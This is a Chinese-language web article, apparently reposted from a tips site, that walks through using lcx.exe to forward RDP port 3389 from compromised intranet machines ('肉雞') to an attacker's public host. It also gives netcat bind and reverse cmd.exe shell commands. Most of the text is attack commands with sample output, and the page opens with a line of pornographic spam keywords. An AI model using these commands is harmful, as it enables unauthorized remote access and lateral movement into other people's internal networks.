人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動態(tài)

lcx端口轉發(fā)詳細介紹及使用方法(lcx內網(wǎng)轉發(fā)姿勢)

發(fā)布日期:2021-12-12 00:03 | 文章來源:腳本之家

這里小編要講解到另外一款比較強大的LCX端口轉發(fā)的工具.

下面就先詳細講解下LXC轉發(fā)工具與使用方法:

lcx.exe是個端口轉發(fā)工具,相當于把肉雞A上的3389端口轉發(fā)到B機上,
當然這個B機必須有外網(wǎng)IP.這樣鏈接B機的3389度端口就相當于鏈接A機的3389.

用法:

如在本機B上監(jiān)聽 -listen 51 3389,在肉雞A上運行-slave
本機ip 51 肉雞ip 3389 那么在本地連127.0.0.1就可以連肉雞的3389.第二條是本機轉向。
例:現(xiàn)在有一個ip為222.221.221.22的websehll.用端口掃描發(fā)現(xiàn)開放了3389端口
可是我們輸入外網(wǎng)IP可是不能正常鏈接。那么很有可能就是內網(wǎng)服務器。我們dos執(zhí)行ipconfig可以看到。

這樣的就是內網(wǎng)服務器了。
上傳lcx.exe到肉雞 然后 cx.exe -listen 51 3389 意思是監(jiān)聽51端口并轉發(fā)到3389端口。
顯示如下[+] Listening port 51 ……
[+] Listen OK!
[+] Listening port 3389 ……
[+] Listen OK!
[+] Waiting for Client on port:51 ……
然后在肉雞上運行 lcx.exe -slave 你的IP 51 222.221.221.22 3389
222.221.221.22是我舉例用的肉雞IP.換成你的..運行以后本機監(jiān)聽端口。
顯示如下信息
[+] Listening port 51 ……
[+] Listen OK!
[+] Listening port 3389 ……
[+] Listen OK!
[+] Waiting for Client on port:51 ……
[+] Accept a Client on port 55 from 222.221.221.22 ……
[+] Waiting another Client on port:3389….
好了.現(xiàn)在在自己機子上鏈接 127.0.0.1 或者輸你自己IP.
發(fā)現(xiàn)進去的不是自己機子,(或者自己機子根本連不上),而是肉雞A了!優(yōu)點,搞定內網(wǎng)肉雞.
缺點,有點麻煩,而且每次都要通過sqltools先進行端口轉發(fā).當然也可以用反彈木馬控制肉雞

下面是其他網(wǎng)友的補充:

本機: lcx -listen 2222 3333

2222為轉發(fā)端口,3333為本機任意未被占用的端口

肉雞:lcx -slave 119.75.217.56 2222 127.0.0.1 3389

119.75.217.56 為本機IP,2222為轉發(fā)端口,127.0.0.1為肉雞內網(wǎng)IP,3389為遠程終端端口

3389連接時格式 127.0.0.1:3333

內網(wǎng)轉發(fā)姿勢

一、lcx 的使用

1. 肉雞上執(zhí)行:lcx.exe –slave 公網(wǎng) ip + 端口 肉雞 ip + 端口

例如:lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389

意思是把肉雞的 3389 端口轉發(fā)到 xxx.xxx.xxx.xxx 公網(wǎng)的 10000 端口

2. 公網(wǎng) ip 機器上執(zhí)行 Lcx.exe –listen 10000 10001

例如:Lcx.exe –listen 10001 10000

意思是監(jiān)聽公網(wǎng) ip 機器上的 10001 端口請求,并將 10001 的請求傳送給 10000 端口。

此時,RDP 連接,只需要輸入 127.0.0.1:10000,即可遠程連接到肉雞上。

二、nc 反彈 cmdshell

1. 開啟肉雞代理執(zhí)行 cmdshell

在肉雞上執(zhí)行 nc -l -p 2333 -t -e cmd.exe

意思是,肉雞監(jiān)聽本地的 2333 端口,且應答通過 telnet(-t)模式執(zhí)行 cmd.exe 程序

在自己的公網(wǎng)服務器上執(zhí)行 nc -nvv 肉雞 ip 2333

2. 反向代理執(zhí)行 cmdshell

在公網(wǎng)服務器上運行 nc -l -p 2333

意思是監(jiān)聽本地端口 2333,登臺其他電腦登陸過來

在肉雞上執(zhí)行 nc -t -e cmd.exe 公網(wǎng)服務器 ip 2333

意思是讓肉雞可以通過 telnet 模式執(zhí)行 cmd.exe 程序,并可以把執(zhí)行權通過 2333 端口給公網(wǎng)服務器

版權聲明:本站文章來源標注為YINGSOO的內容版權均為本站所有,歡迎引用、轉載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務器上建立鏡像,否則將依法追究法律責任。本站部分內容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學習參考,不代表本站立場,如有內容涉嫌侵權,請聯(lián)系alex-e#qq.com處理。

相關文章

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務

7x24全年不間斷在線

專屬顧問服務

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務熱線

關注
微信

關注官方微信
頂部